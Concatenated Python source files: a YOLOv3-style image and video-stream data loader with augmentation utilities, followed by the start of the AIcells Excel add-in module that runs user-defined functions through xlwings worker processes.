        self.cap = cv2.VideoCapture(pipe)  # video capture object
        self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3)  # set buffer size

    def __iter__(self):
        # Starts at -1 so the first __next__ call reports frame 0.
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
        if cv2.waitKey(1) == ord('q'):  # q to quit
            self.cap.release()
            cv2.destroyAllWindows()
            raise StopIteration

        # Read frame
        if self.pipe == 0:  # local camera
            ret_val, img0 = self.cap.read()
            img0 = cv2.flip(img0, 1)  # flip left-right
        else:  # IP camera
            # Grab continuously but only decode every 30th frame to keep
            # up with the stream.
            n = 0
            while True:
                n += 1
                self.cap.grab()
                if n % 30 == 0:  # skip frames
                    ret_val, img0 = self.cap.retrieve()
                    if ret_val:
                        break

        # Print
        assert ret_val, 'Camera Error %s' % self.pipe
        img_path = 'webcam.jpg'
        print('webcam %g: ' % self.count, end='')

        # Padded resize
        img, *_ = letterbox(img0, new_shape=self.img_size)

        # Normalize RGB
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB
        img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32)  # uint8 to fp16/fp32
        img /= 255.0  # 0 - 255 to 0.0 - 1.0

        return img_path, img, img0, None

    def __len__(self):
        return 0
class LoadStreams:  # multiple IP or RTSP cameras
    """Read several camera/RTSP streams concurrently for inference.

    One daemon thread per source keeps self.imgs[i] updated with the
    latest frame; each iteration yields (sources, stacked CHW RGB float
    batch, list of original BGR frames, None).
    """

    def __init__(self, sources='streams.txt', img_size=416, half=False):
        self.mode = 'images'
        self.img_size = img_size
        self.half = half  # half precision fp16 images

        # `sources` may be a file listing one stream per line, or a single
        # stream string.
        if os.path.isfile(sources):
            with open(sources, 'r') as f:
                sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
        else:
            sources = [sources]

        n = len(sources)
        self.imgs = [None] * n
        self.sources = sources
        for i, s in enumerate(sources):
            # Start the thread to read frames from the video stream
            print('%g/%g: %s... ' % (i + 1, n, s), end='')
            cap = cv2.VideoCapture(0 if s == '0' else s)
            assert cap.isOpened(), 'Failed to open %s' % s
            w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
            h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
            fps = cap.get(cv2.CAP_PROP_FPS) % 100
            _, self.imgs[i] = cap.read()  # guarantee first frame
            # Daemon thread: dies with the main process, no join needed.
            thread = Thread(target=self.update, args=([i, cap]), daemon=True)
            print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
            thread.start()
        print('')  # newline

    def update(self, index, cap):
        # Read next stream frame in a daemon thread
        n = 0
        while cap.isOpened():
            n += 1
            # _, self.imgs[index] = cap.read()
            cap.grab()
            if n == 4:  # read every 4th frame
                _, self.imgs[index] = cap.retrieve()
                n = 0
            time.sleep(0.01)  # wait time

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
        # Shallow copy so the reader threads can keep replacing entries.
        img0 = self.imgs.copy()
        if cv2.waitKey(1) == ord('q'):  # q to quit
            cv2.destroyAllWindows()
            raise StopIteration

        # Letterbox
        img = [letterbox(x, new_shape=self.img_size, interp=cv2.INTER_LINEAR)[0] for x in img0]

        # Stack
        img = np.stack(img, 0)

        # Normalize RGB
        img = img[:, :, :, ::-1].transpose(0, 3, 1, 2)  # BGR to RGB
        img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32)  # uint8 to fp16/fp32
        img /= 255.0  # 0 - 255 to 0.0 - 1.0

        return self.sources, img, img0, None

    def __len__(self):
        return 0  # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=True, image_weights=False,
             cache_labels=False, cache_images=False):
    """Build a dataset of images + YOLO-format label files.

    path: text file listing one image path per line; label paths are
    derived by swapping 'images' -> 'labels' and the extension -> '.txt'.
    rect enables per-batch rectangular shapes (disabled when
    image_weights is on); cache_labels/cache_images preload data into
    memory for faster training.
    """
    path = str(Path(path))  # os-agnostic
    with open(path, 'r') as f:
        self.img_files = [x.replace('/', os.sep) for x in f.read().splitlines()  # os-agnostic
                          if os.path.splitext(x)[-1].lower() in img_formats]

    n = len(self.img_files)
    # NOTE(review): np.int is a deprecated alias (removed in NumPy >= 1.24);
    # confirm the pinned NumPy version still provides it.
    bi = np.floor(np.arange(n) / batch_size).astype(np.int)  # batch index
    nb = bi[-1] + 1  # number of batches
    assert n > 0, 'No images found in %s' % path

    self.n = n
    self.batch = bi  # batch index of image
    self.img_size = img_size
    self.augment = augment
    self.hyp = hyp
    self.image_weights = image_weights
    # Rectangular training is incompatible with image weighting.
    self.rect = False if image_weights else rect

    # Define labels
    self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
                        for x in self.img_files]

    # Rectangular Training  https://github.com/ultralytics/yolov3/issues/232
    if self.rect:
        # Read image shapes
        sp = 'data' + os.sep + path.replace('.txt', '.shapes').split(os.sep)[-1]  # shapefile path
        try:
            with open(sp, 'r') as f:  # read existing shapefile
                s = [x.split() for x in f.read().splitlines()]
                assert len(s) == n, 'Shapefile out of sync'
        # NOTE(review): bare except also hides KeyboardInterrupt; it exists
        # to regenerate the cache on any read/parse failure.
        except:
            s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
            np.savetxt(sp, s, fmt='%g')  # overwrites existing (if any)

        # Sort by aspect ratio
        s = np.array(s, dtype=np.float64)
        ar = s[:, 1] / s[:, 0]  # aspect ratio
        i = ar.argsort()
        # NOTE: the comprehension loop variable shadows the sort-index
        # array `i`; this works because each comprehension has its own
        # scope, but it is easy to misread.
        self.img_files = [self.img_files[i] for i in i]
        self.label_files = [self.label_files[i] for i in i]
        self.shapes = s[i]
        ar = ar[i]

        # Set training image shapes: one (h, w) multiplier per batch so a
        # whole batch shares the smallest shape that fits all its images.
        shapes = [[1, 1]] * nb
        for i in range(nb):
            ari = ar[bi == i]
            mini, maxi = ari.min(), ari.max()
            if maxi < 1:
                shapes[i] = [maxi, 1]
            elif mini > 1:
                shapes[i] = [1, 1 / mini]

        # Round batch shapes up to a multiple of 32 (network stride).
        self.batch_shapes = np.ceil(np.array(shapes) * img_size / 32.).astype(np.int) * 32

    # Preload labels (required for weighted CE training)
    self.imgs = [None] * n
    self.labels = [None] * n
    if cache_labels or image_weights:  # cache labels for faster training
        self.labels = [np.zeros((0, 5))] * n
        # Debug/offline switches; both disabled in normal operation.
        extract_bounding_boxes = False
        create_datasubset = False
        pbar = tqdm(self.label_files, desc='Reading labels')
        nm, nf, ne, ns = 0, 0, 0, 0  # number missing, number found, number empty, number datasubset
        for i, file in enumerate(pbar):
            try:
                with open(file, 'r') as f:
                    l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
            # NOTE(review): bare except treats any open/parse failure as a
            # missing label file (and also hides KeyboardInterrupt).
            except:
                nm += 1  # print('missing labels for image %s' % self.img_files[i])  # file missing
                continue

            if l.shape[0]:
                # Each row: class, x_center, y_center, w, h (normalized).
                assert l.shape[1] == 5, '> 5 label columns: %s' % file
                assert (l >= 0).all(), 'negative labels: %s' % file
                assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
                self.labels[i] = l
                nf += 1  # file found

                # Create subdataset (a smaller dataset)
                if create_datasubset and ns < 1E4:
                    if ns == 0:
                        create_folder(path='./datasubset')
                        os.makedirs('./datasubset/images')
                    exclude_classes = 43
                    if exclude_classes not in l[:, 0]:
                        ns += 1
                        # shutil.copy(src=self.img_files[i], dst='./datasubset/images/')  # copy image
                        with open('./datasubset/images.txt', 'a') as f:
                            f.write(self.img_files[i] + '\n')

                # Extract object detection boxes for a second stage classifier
                if extract_bounding_boxes:
                    p = Path(self.img_files[i])
                    img = cv2.imread(str(p))
                    h, w, _ = img.shape
                    for j, x in enumerate(l):
                        f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
                        if not os.path.exists(Path(f).parent):
                            os.makedirs(Path(f).parent)  # make new output folder
                        # Crop 1.5x the labeled box, clipped to the image.
                        box = xywh2xyxy(x[1:].reshape(-1, 4) * np.array([1, 1, 1.5, 1.5])).ravel()
                        b = np.clip(box, 0, 1)  # clip boxes outside of image
                        ret_val = cv2.imwrite(f, img[int(b[1] * h):int(b[3] * h), int(b[0] * w):int(b[2] * w)])
                        assert ret_val, 'Failure extracting classifier boxes'
            else:
                ne += 1  # file empty

            pbar.desc = 'Reading labels (%g found, %g missing, %g empty for %g images)' % (nf, nm, ne, n)
        assert nf > 0, 'No labels found. Recommend correcting image and label paths.'

    # Cache images into memory for faster training (~5GB)
    if cache_images and augment:  # if training
        for i in tqdm(range(min(len(self.img_files), 10000)), desc='Reading images'):  # max 10k images
            img_path = self.img_files[i]
            img = cv2.imread(img_path)  # BGR
            assert img is not None, 'Image Not Found ' + img_path
            r = self.img_size / max(img.shape)  # size ratio
            if self.augment and r < 1:  # if training (NOT testing), downsize to inference shape
                h, w, _ = img.shape
                img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR)  # or INTER_AREA
            self.imgs[i] = img

    # Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
    detect_corrupted_images = False
    if detect_corrupted_images:
        from skimage import io  # conda install -c conda-forge scikit-image
        for file in tqdm(self.img_files, desc='Detecting corrupted images'):
            try:
                _ = io.imread(file)
            # NOTE(review): bare except — any read failure is reported as
            # corruption (and KeyboardInterrupt is swallowed too).
            except:
                print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
    def __getitem__(self, index):
        """Load one sample: image tensor, labels, path and original (h, w).

        Returns:
            img: float32 CHW RGB tensor in [0, 1].
            labels_out: (nL, 6) tensor [batch_idx, cls, x, y, w, h]; the batch
                index column is filled later by collate_fn.
            img_path: path of the source image.
            (h, w): image shape *before* letterboxing (after optional downsize).
        """
        if self.image_weights:
            # Remap through the weighted-sampling index table.
            index = self.indices[index]
        img_path = self.img_files[index]
        label_path = self.label_files[index]
        hyp = self.hyp
        # Load image (from the in-memory cache when available)
        img = self.imgs[index]
        if img is None:
            img = cv2.imread(img_path)  # BGR
            assert img is not None, 'Image Not Found ' + img_path
            r = self.img_size / max(img.shape)  # size ratio
            if self.augment and r < 1:  # if training (NOT testing), downsize to inference shape
                h, w, _ = img.shape
                img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR)  # INTER_LINEAR fastest
        # Augment colorspace
        augment_hsv = True
        if self.augment and augment_hsv:
            # SV augmentation by 50%
            img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)  # hue, sat, val
            S = img_hsv[:, :, 1].astype(np.float32)  # saturation
            V = img_hsv[:, :, 2].astype(np.float32)  # value
            a = random.uniform(-1, 1) * hyp['hsv_s'] + 1
            b = random.uniform(-1, 1) * hyp['hsv_v'] + 1
            S *= a
            V *= b
            # Only clip when gain > 1; values shrink otherwise and cannot overflow.
            img_hsv[:, :, 1] = S if a < 1 else S.clip(None, 255)
            img_hsv[:, :, 2] = V if b < 1 else V.clip(None, 255)
            cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img)  # write back in place
        # Letterbox
        h, w, _ = img.shape
        if self.rect:
            shape = self.batch_shapes[self.batch[index]]
            img, ratiow, ratioh, padw, padh = letterbox(img, new_shape=shape, mode='rect')
        else:
            shape = self.img_size
            img, ratiow, ratioh, padw, padh = letterbox(img, new_shape=shape, mode='square')
        # Load labels
        labels = []
        if os.path.isfile(label_path):
            x = self.labels[index]
            if x is None:  # labels not preloaded
                with open(label_path, 'r') as f:
                    x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
            if x.size > 0:
                # Normalized xywh to pixel xyxy format (letterbox scale + padding applied)
                labels = x.copy()
                labels[:, 1] = ratiow * w * (x[:, 1] - x[:, 3] / 2) + padw
                labels[:, 2] = ratioh * h * (x[:, 2] - x[:, 4] / 2) + padh
                labels[:, 3] = ratiow * w * (x[:, 1] + x[:, 3] / 2) + padw
                labels[:, 4] = ratioh * h * (x[:, 2] + x[:, 4] / 2) + padh
        # Augment image and labels
        if self.augment:
            img, labels = random_affine(img, labels,
                                        degrees=hyp['degrees'],
                                        translate=hyp['translate'],
                                        scale=hyp['scale'],
                                        shear=hyp['shear'])
            # Cutout (applied 90% of the time)
            if random.random() < 0.9:
                labels = cutout(img, labels)
        nL = len(labels)  # number of labels
        if nL:
            # convert xyxy to xywh
            labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
            # Normalize coordinates 0 - 1
            labels[:, [2, 4]] /= img.shape[0]  # height
            labels[:, [1, 3]] /= img.shape[1]  # width
        if self.augment:
            # random left-right flip
            lr_flip = True
            if lr_flip and random.random() < 0.5:
                img = np.fliplr(img)
                if nL:
                    labels[:, 1] = 1 - labels[:, 1]  # mirror normalized x center
            # random up-down flip
            ud_flip = False
            if ud_flip and random.random() < 0.5:
                img = np.flipud(img)
                if nL:
                    labels[:, 2] = 1 - labels[:, 2]  # mirror normalized y center
        labels_out = torch.zeros((nL, 6))
        if nL:
            labels_out[:, 1:] = torch.from_numpy(labels)
        # Normalize
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img, dtype=np.float32)  # uint8 to float32
        img /= 255.0  # 0 - 255 to 0.0 - 1.0
        return torch.from_numpy(img), labels_out, img_path, (h, w)
@staticmethod
def collate_fn(batch):
img, label, path, hw = list(zip(*batch)) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, hw
def letterbox(img, new_shape=416, color=(128, 128, 128), mode='auto', interp=cv2.INTER_AREA):
    """Resize a rectangular image into a padded ("letterboxed") rectangle.

    https://github.com/ultralytics/yolov3/issues/232

    Arguments:
        img: HxWxC numpy image.
        new_shape: target size — an int for 'auto'/'square'/'scaleFill',
            an (h, w) pair for 'rect'.
        color: BGR padding color.
        mode: 'auto' (pad to minimum 32-multiple rectangle), 'square',
            'rect', or 'scaleFill' (stretch to square, no padding).
        interp: cv2 interpolation flag used for the resize.

    Returns:
        (img, ratiow, ratioh, dw, dh): padded image, per-axis scale ratios,
        and padding added on each side of the width/height.

    Raises:
        ValueError: if `mode` is not one of the supported modes (previously
        an unknown mode fell through and crashed with an UnboundLocalError).
    """
    shape = img.shape[:2]  # current shape [height, width]
    if isinstance(new_shape, int):
        ratio = float(new_shape) / max(shape)
    else:
        ratio = max(new_shape) / max(shape)  # ratio = new / old
    ratiow, ratioh = ratio, ratio
    new_unpad = (int(round(shape[1] * ratio)), int(round(shape[0] * ratio)))

    # Compute padding https://github.com/ultralytics/yolov3/issues/232
    # Bug fix: string modes are compared with '==' instead of 'is' — identity
    # comparison of literals is implementation-dependent (CPython interning)
    # and raises SyntaxWarning on modern interpreters.
    if mode == 'auto':  # minimum rectangle: pad up to the next 32-multiple
        dw = np.mod(new_shape - new_unpad[0], 32) / 2  # width padding
        dh = np.mod(new_shape - new_unpad[1], 32) / 2  # height padding
    elif mode == 'square':  # pad to an exact new_shape x new_shape square
        dw = (new_shape - new_unpad[0]) / 2  # width padding
        dh = (new_shape - new_unpad[1]) / 2  # height padding
    elif mode == 'rect':  # pad to an exact (h, w) rectangle
        dw = (new_shape[1] - new_unpad[0]) / 2  # width padding
        dh = (new_shape[0] - new_unpad[1]) / 2  # height padding
    elif mode == 'scaleFill':  # stretch to square, no padding
        dw, dh = 0.0, 0.0
        new_unpad = (new_shape, new_shape)
        ratiow, ratioh = new_shape / shape[1], new_shape / shape[0]
    else:
        raise ValueError('unsupported letterbox mode: %s' % mode)

    if shape[::-1] != new_unpad:  # resize
        img = cv2.resize(img, new_unpad, interpolation=interp)  # INTER_AREA is better, INTER_LINEAR is faster
    top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
    left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
    img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)  # add border
    return img, ratiow, ratioh, dw, dh
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10):
    """Apply a random affine transform (rotate/scale/translate/shear) to an
    image and its xyxy targets, dropping boxes that become degenerate.

    torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
    https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4

    Arguments:
        img: HxWxC numpy image.
        targets: (n, 5) array [cls, x1, y1, x2, y2] in pixels (may be empty).
        degrees, translate, scale, shear: augmentation magnitudes sampled
            uniformly in +/- range.

    Returns:
        (imw, targets): warped image and the surviving, warped targets.
    """
    if targets is None:
        targets = []
    border = 0  # width of added border (optional)
    height = img.shape[0] + border * 2
    width = img.shape[1] + border * 2
    # Rotation and Scale
    R = np.eye(3)
    a = random.uniform(-degrees, degrees)
    # a += random.choice([-180, -90, 0, 90])  # add 90deg rotations to small rotations
    s = random.uniform(1 - scale, 1 + scale)
    R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
    # Translation
    T = np.eye(3)
    T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border  # x translation (pixels)
    T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border  # y translation (pixels)
    # Shear
    S = np.eye(3)
    S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # x shear (deg)
    S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # y shear (deg)
    M = S @ T @ R  # Combined rotation matrix. ORDER IS IMPORTANT HERE!!
    imw = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_AREA,
                         borderValue=(128, 128, 128))  # BGR order borderValue
    # Return warped points also
    if len(targets) > 0:
        n = targets.shape[0]
        points = targets[:, 1:5].copy()
        area0 = (points[:, 2] - points[:, 0]) * (points[:, 3] - points[:, 1])  # pre-warp box areas
        # warp points: all four corners of every box through M
        xy = np.ones((n * 4, 3))
        xy[:, :2] = points[:, [0, 1, 2, 3, 0, 3, 2, 1]].reshape(n * 4, 2)  # x1y1, x2y2, x1y2, x2y1
        xy = (xy @ M.T)[:, :2].reshape(n, 8)
        # create new boxes: axis-aligned bounding box of the warped corners
        x = xy[:, [0, 2, 4, 6]]
        y = xy[:, [1, 3, 5, 7]]
        xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
        # # apply angle-based reduction of bounding boxes
        # radians = a * math.pi / 180
        # reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
        # x = (xy[:, 2] + xy[:, 0]) / 2
        # y = (xy[:, 3] + xy[:, 1]) / 2
        # w = (xy[:, 2] - xy[:, 0]) * reduction
        # h = (xy[:, 3] - xy[:, 1]) * reduction
        # xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
        # reject warped points outside of image
        xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
        xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
        w = xy[:, 2] - xy[:, 0]
        h = xy[:, 3] - xy[:, 1]
        area = w * h
        ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16))  # aspect ratio
        # keep boxes that stay >4px, retain >10% of area, and are not extreme slivers
        i = (w > 4) & (h > 4) & (area / (area0 + 1e-16) > 0.1) & (ar < 10)
        targets = targets[i]
        targets[:, 1:5] = xy[i]
    return imw, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2, x1y1x2y2=True):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 # + [0.25] * 4 + [0.125] * 16 + [0.0625] * 64 + [0.03125] * 256 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
mask_color = [random.randint(0, 255) for _ in range(3)]
image[ymin:ymax, xmin:xmax] = mask_color
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.90] # remove >90% obscured labels
return labels
def convert_images2bmp():
    """One-off COCO conversion: re-save jpg images as bmp and rewrite label
    lists accordingly (cv2.imread() jpg at 230 img/s, *.bmp at 400 img/s).

    Side effects: creates '<split>bmp' image folders with converted copies
    and writes '*5k_bmp*' label-list files with the paths rewritten.
    """
    for img_dir in ['../coco/images/val2014/', '../coco/images/train2014/']:
        folder = os.sep + Path(img_dir).name
        bmp_dir = img_dir.replace(folder, folder + 'bmp')
        if os.path.exists(bmp_dir):
            shutil.rmtree(bmp_dir)  # start from a clean output folder
        os.makedirs(bmp_dir)
        for jpg_file in tqdm(glob.glob('%s*.jpg' % img_dir)):
            bmp_file = jpg_file.replace('.jpg', '.bmp').replace(folder, folder + 'bmp')
            cv2.imwrite(bmp_file, cv2.imread(jpg_file))
    for label_path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
        with open(label_path, 'r') as fh:
            contents = fh.read()
        contents = (contents.replace('2014/', '2014bmp/')
                    .replace('.jpg', '.bmp')
                    .replace('/Users/glennjocher/PycharmProjects/', '../'))
        with open(label_path.replace('5k', '5k_bmp'), 'w') as fh:
            fh.write(contents)
def create_folder(path='./new_folder'):
    """Create an empty folder at `path`, deleting any existing one first."""
    if os.path.exists(path):
        shutil.rmtree(path)  # wipe previous contents
    os.makedirs(path)
|
__init__.py | # AIcells (https://github.com/aicells/aicells) - Copyright 2020 Gergely Szerovay, László Siller
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import yaml
import os
import pandas
import xlwings
import multiprocessing
import time
from . import UDFUtils
from . import AICFactory
from . import AICException
# Parsed contents of aicells-config.yml (populated at import time, see the
# module-level loading code at the bottom of this file).
aicConfig = {}
# Handle to the single in-flight UDF worker process (None when idle).
globalProcess = None
# multiprocessing.Queue the worker uses to stream ['debug', ...] messages
# and the final ['result', ...] item back to the Excel-side poller.
globalQueue = None
def RunUDFProcessWrapper(args, timeStart, q=None):
    """Worker-process entry point: run the UDF and report timing + result.

    Arguments:
        args: UDF argument tuple ([0] name, [1] parameters, [2] namespace
            list, [3:] ranges) — forwarded to RunUDF unchanged.
        timeStart: time.time() captured by the parent before spawning, so the
            reported duration includes process start-up and data transfer in.
        q: multiprocessing.Queue used to send ['debug', message] and the final
            ['result', value] back to the poller (aicQueueGet). Required in
            practice — aicProcessRunner always supplies it.

    Fix: removed leftover debug print() calls that dumped raw timestamps to
    stdout on every run.
    """
    result = RunUDF(args, q)
    diff = time.time() - timeStart
    q.put(['debug', f"Python function run time (wo. data transfer): {diff:.2f}s"])
    q.put(['result', result])
def RunUDF(args, q=None):
    """Execute the named UDF synchronously and return an Excel-ready result.

    args layout:
        [0]  - udf name (resolved through the factory as "function-class.<name>")
        [1]  - udf parameters (2-column key/value range coming from Excel)
        [2]  - namespace list: up to 10 names for the trailing range arguments
        [3-] - ranges (one per non-None namespace entry)
    q: optional queue handed to the function instance for debug messages.

    Returns either the UDF's result range, an '#AICELLS-SVG!'-tagged range,
    the filename written by a data-source output, or an error range produced
    by AICException.AICErrorToExcelRange.
    """
    # NOTE(review): declared but never read or assigned in this function —
    # confirm it is still needed.
    global globalOutputRange
    args = list(args)  # tuple to list
    # build a dictionary from the ranges, the keys are the names in the namespace
    rangeDict = {}
    # Exactly 10 namespace slots are expected (fixed VBA-side signature).
    for i in range(0, 10):
        if not (args[2][i] is None):
            idx0 = i + 3
            # single value passed, convert to 2d
            if (not isinstance(args[idx0], list)):
                args[idx0] = [[args[idx0]]]
            else:
                # single 1d row passed, convert to 2d
                if (not isinstance(args[idx0][0], list)):
                    args[idx0] = [args[idx0]]
            # replace empty strings with None
            for idx1, v1 in enumerate(args[idx0]):
                for idx2, v2 in enumerate(v1):
                    if isinstance(v2, str):
                        if v2 == "":
                            args[idx0][idx1][idx2] = None
            rangeDict[args[2][i]] = args[idx0]
    # merge the udf arguments into the base namespace
    try:
        if not ("parameters" in rangeDict):
            rangeDict['parameters'] = []
        if len(rangeDict['parameters']) == 2:
            if len(rangeDict['parameters'][0]) != 2:
                # vertical parameter table => transpose it
                rangeDict['parameters'] = UDFUtils.Transpose2DList(rangeDict['parameters'])
        if isinstance(args[1], list):
            if len(args[1]) > 0:
                # A single key/value pair arrives as a flat 2-element row.
                if (len(args[1]) == 2) and (not isinstance(args[1][0], list)):
                    args[1] = [args[1]]
                for i in range(0, len(args[1])):
                    # parameters range should have exactly 2 columns
                    if len(args[1][i]) != 2:
                        raise AICException.AICEParameterError("PARAMETER_ERROR", {"parameterName": "parameters"})
                    key = args[1][i][0]
                    value = args[1][i][1]
                    match = False
                    for j in range(0, len(rangeDict['parameters'])):
                        if key == rangeDict['parameters'][j][0]:
                            match = True
                            if value == '@AICELLS-RANGE@':
                                # Range placeholder always wins.
                                rangeDict['parameters'][j][1] = value
                            elif not (value is None):
                                # if (not (rangeDict['parameters'][j][1] is None)) and (rangeDict['parameters'][j][1] != ""):
                                # Refuse to silently overwrite a value set twice.
                                if not (rangeDict['parameters'][j][1] is None):
                                    raise AICException.AICEParameterError("PARAMETER_COLLISION", {"parameterName": key})
                                rangeDict['parameters'][j][1] = value
                    if not match:
                        rangeDict['parameters'].append([key, value])
    except AICException.AICEParameterError as e:
        return AICException.AICErrorToExcelRange(e.GetErrorList())
    dataSourceClass = None
    try:
        # Instantiate the UDF implementation class by name.
        c = factory.CreateInstance("function-class." + args[0])
        c.SetQueue(q)
        c.SetConfig(aicConfig)
    except Exception as e:
        e = AICException.AICException("UNKNOWN_FUNCTION")
        return AICException.AICErrorToExcelRange(e.GetErrorList())
    if 'parameters.output' in rangeDict:
        try:
            dataSourceClass = c.GetDataSourceClass(rangeDict['parameters.output'])
        except Exception as e:
            # Best effort: no output data source means the result is returned inline.
            pass
    try:
        result = c.Run(rangeDict)
    except AICException.AICException as e:
        return AICException.AICErrorToExcelRange(e.GetErrorList())
    if 'svg' in c.GetTag():
        # SVG-producing UDFs are marked so the add-in renders them specially.
        return [['#AICELLS-SVG!'] + result]
    if dataSourceClass is None:
        return result
    else:
        # Route the result through the configured output data source (file, db, ...).
        try:
            try:
                dataSource = factory.CreateInstance('tool-class.' + dataSourceClass.replace('.', '_'))
            except Exception as e:
                raise AICException.AICEParameterError("DATA_SOURCE_UNKNOWN", {"data_source": 'data_source'})
            dataSourceArguments = dataSource.ProcessArguments(rangeDict, 'parameters.output')
            try:
                header = False
                if 'header' in dataSourceArguments:
                    if dataSourceArguments['header']:
                        header = True
                if header:
                    # First result row becomes the DataFrame column labels.
                    columns = result[0]
                    if not isinstance(columns, list):  # single column
                        columns = [columns]
                    df = pandas.DataFrame(result[1:], columns=columns)
                else:
                    df = pandas.DataFrame(result)
                fn = dataSource.Write(df, c.workbookPath, dataSourceArguments, 'output')
                return fn  # 'Output saved: '
            except AICException.AICException as e:
                raise
                # raise AICException.AICException("DATA_SOURCE_ERROR", {"parameterName": 'data_source'})
        except AICException.AICException as e:
            return AICException.AICErrorToExcelRange(e.GetErrorList())
        except Exception as e:
            # Anything unexpected is wrapped as a FATAL_ERROR range for Excel.
            errorMessage = ""
            if len(e.args) > 0:
                errorMessage = e.args[0]
            e2 = AICException.AICException("FATAL_ERROR", {"error": errorMessage})
            return AICException.AICErrorToExcelRange(e2.GetErrorList())
@xlwings.func
def aicUDFRunner(*args):
    """Synchronous xlwings entry point: run the named UDF, return its result.

    args layout: [0] udf name, [1] udf parameters, [2] namespace list,
    [3:] ranges (see RunUDF).
    """
    sys.stderr.write(f"Call from VBA UDF {args[0]}:\n")
    return RunUDF(args)
@xlwings.func
def aicProcessRunner(*args):
    """Start the named UDF asynchronously in a separate worker process.

    args layout: [0] udf name, [1] udf parameters, [2] namespace list,
    [3:] ranges. Returns 'OK' when the worker was launched, 'ERROR' when a
    worker is already running; results are collected later via aicQueueGet.
    """
    global globalProcess, globalQueue
    sys.stderr.write("Call from VBA Runner tool " + args[0] + ":\n")
